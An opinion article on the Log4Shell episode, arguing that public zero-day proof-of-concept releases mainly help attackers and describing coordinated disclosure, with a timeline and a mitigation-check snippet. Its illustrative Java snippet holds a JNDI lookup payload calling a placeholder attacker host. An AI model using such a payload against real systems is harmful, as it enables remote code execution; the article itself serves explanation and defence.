Log4j Showed Us That Public Disclosure Still Helps Attackers


At 2:25 pm on December 9, 2021, an infamous (now deleted) tweet linking to a zero-day proof-of-concept exploit on GitHub (also now deleted) for the vulnerability that came to be known as ‘Log4Shell’ set the internet on fire. It also kicked off a holiday season of companies scrambling to mitigate, patch and then patch some more, as further proofs of concept appeared for successive iterations of a vulnerability that was present in pretty much everything that used Log4j.
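
For context on why the flaw was so pervasive, the vulnerable pattern was an ordinary logging call. The snippet below is a minimal illustration only, assuming a Log4j 2.x version prior to 2.15.0 (where message lookups were resolved by default) and using a placeholder attacker domain; it is not a working exploit.

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    public class LookupIllustration {
        private static final Logger logger = LogManager.getLogger(LookupIllustration.class);

        public static void main(String[] args) {
            // Attacker-controlled input, e.g. a User-Agent header or a username field.
            String userInput = "${jndi:ldap://attacker.example.com/a}";

            // On Log4j 2.0-beta9 through 2.14.1, lookups embedded in the formatted
            // message are resolved, so this single line can trigger an outbound
            // JNDI/LDAP request and, at worst, remote code execution.
            logger.error("Login failed for user: {}", userInput);
        }
    }

Because almost any string that eventually reached a logger could carry the lookup, the attack surface was effectively every input field of every Java application that used the library.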

This kind of release is otherwise known as public disclosure: telling the world that something is vulnerable and backing it up with a proof of concept. The practice is not new and happens quite frequently for all sorts of software, from the most esoteric to the mundane. Over time, however, research and experience have consistently shown that the only beneficiaries of zero-day proof-of-concept releases are threat actors, because such releases suddenly put companies in the awkward position of having to mitigate without necessarily having anything to mitigate with (i.e., a vendor patch).
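
In the Log4Shell case, ‘mitigating without a patch’ meant stopgaps such as the log4j2.formatMsgNoLookups property, the equivalent LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable, or stripping the JndiLookup class out of the jar. The sketch below is a hypothetical check rather than official guidance: it simply reports whether one of those stopgaps is set on a JVM. Apache later noted that the flag alone did not cover every attack path, so upgrading remained the only complete fix.

    public class MitigationCheck {
        public static void main(String[] args) {
            // JVM flag form: -Dlog4j2.formatMsgNoLookups=true (honoured by Log4j 2.10+).
            boolean propSet = Boolean.parseBoolean(
                    System.getProperty("log4j2.formatMsgNoLookups", "false"));

            // Environment variable form: LOG4J_FORMAT_MSG_NO_LOOKUPS=true.
            boolean envSet = Boolean.parseBoolean(
                    System.getenv().getOrDefault("LOG4J_FORMAT_MSG_NO_LOOKUPS", "false"));

            System.out.println("formatMsgNoLookups stopgap present: " + (propSet || envSet));
        }
    }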

How Does Disclosure Usually Work?

All kinds of disclosure mechanisms exist today, from officially sanctioned vulnerability disclosure programs (think of Google and Microsoft) to crowdsourced platforms often referred to as ‘bug bounties.’ Disclosures in these scenarios follow a defined process on an agreed timeline: the vendor releases a patch, users of the software in question are given ample time to apply it (90 days is the accepted standard here), and the proof of concept is only released publicly with vendor approval (this is also known as ‘co-ordinated disclosure’). On top of this, bug bounty platforms place their security researchers under NDAs, so the proof of concept often remains sealed even long after the vulnerability has been fixed.

Having gone through many disclosures myself, both through the CVE process and directly through vendors’ vulnerability disclosure processes, it usually works like this if all goes smoothly:

  • The researcher informs the vendor of the vulnerability, with an accompanying proof of concept
  • The vendor confirms the vulnerability and works on a fix, with an approximate timeline
  • Once the fix is in place, the vendor asks the researcher to confirm that the fix works
  • After the researcher confirms the fix, the vendor releases the patch
  • Once an agreed period has passed after the patch is released, details of the vulnerability can be published if the vendor agrees to it (anything up to 90 days is normal)

Returning to the Log4j vulnerability, there was actually a disclosure process already underway, as evidenced by the pull request that appeared on GitHub on November 30. The actual timeline of the disclosure was slightly different, as laid out in an e-mail to SearchSecurity:

  • 11/24/2021: informed
  • 11/25/2021: accepted report, CVE reserved, researching fix
  • 11/26/2021: communicated with reporter
  • 11/29/2021: communicated with reporter
  • 12/4/2021: changes committed
  • 12/5/2021: changes committed
  • 12/7/2021: first release candidate
  • 12/8/2021: communicated with reporter, additional fixes, second release candidate
  • 12/9/2021: released

While the comments in the thread indicate frustration with the speed of the fix, this is par for the course when it comes to fixing vulnerabilities (as everyone points out, the patch was built by volunteers, after all).

The Reasons for Releasing Zero-Day Proofs of Concept and the Evidence Against

On the surface, there may appear to be legitimate reasons for releasing a zero-day proof of concept. The most common is that the vulnerability disclosure process with the vendor has broken down. This can happen for many reasons: the vendor may be unresponsive (i.e., playing dead), may not consider the vulnerability serious enough to warrant a fix, may take too long to fix it, or some combination of the above. The stance then is to release the proof of concept for the ‘common good,’ which evidence has shown is rarely to the good of the software’s users. There are also peripheral, less convincing reasons for releasing a proof of concept, chief among them publicity, especially if you are linked to a security vendor. Nothing gets press coverage faster than a proof of concept for a common piece of software that everyone uses but that has no patch yet. Unfortunately, this is a mainstay of a lot of security research today.

The evidence against releasing proofs of concept is now robust and overwhelming. A study by Kenna Security on this very topic showed that the only parties to benefit from proof-of-concept exploits were the attackers who leveraged them. Even several years ago, a Black Hat presentation entitled ‘Zero Days, Thousands of Nights’ walked through the lifecycle of zero-days and how they were released and exploited; it found that when proof-of-concept exploits were not disclosed publicly, it took an average of roughly seven years for anybody, threat actors included, to discover the underlying vulnerabilities. Sadly, this lesson was learned a little too late during the Log4j scramble. While the initial disclosures were promptly walked back and deleted, even the most recent disclosure around 2.17.1 ran into the same trouble, drawing enough flak that the researcher issued a public apology for its poor timing.

It’s good to see that attitudes towards the public disclosure of proof-of-concept exploits have shifted, and the criticism of researchers who decide to jump the gun is deserved. Still, the collective work now needs to focus on putting more robust disclosure processes in place for everyone, so that we don’t fall into the trap of repeating this scenario the next time a vulnerability like this rolls around.
